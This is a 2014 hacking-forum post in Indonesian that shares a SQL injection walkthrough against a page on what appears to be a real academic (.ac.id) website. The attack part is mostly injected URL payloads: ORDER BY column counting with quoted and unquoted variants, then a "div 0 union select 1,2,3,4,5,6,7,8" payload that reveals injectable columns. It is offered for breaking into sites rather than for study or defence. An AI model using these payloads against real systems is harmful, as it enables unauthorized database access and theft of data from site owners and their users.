> > > >


[Share] SQL Injection 'order by 10000' and still not error?
wine trochanter Offline
Coder
141 - 929
#1
02-26-2014, 10:32 PM
assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix
 
Find
Reply


Messages In This Thread
SQL Injection 'order by 10000' and still not error? - by wine trochanter - 02-26-2014, 10:32 PM




Users browsing this thread: 1 Guest(s)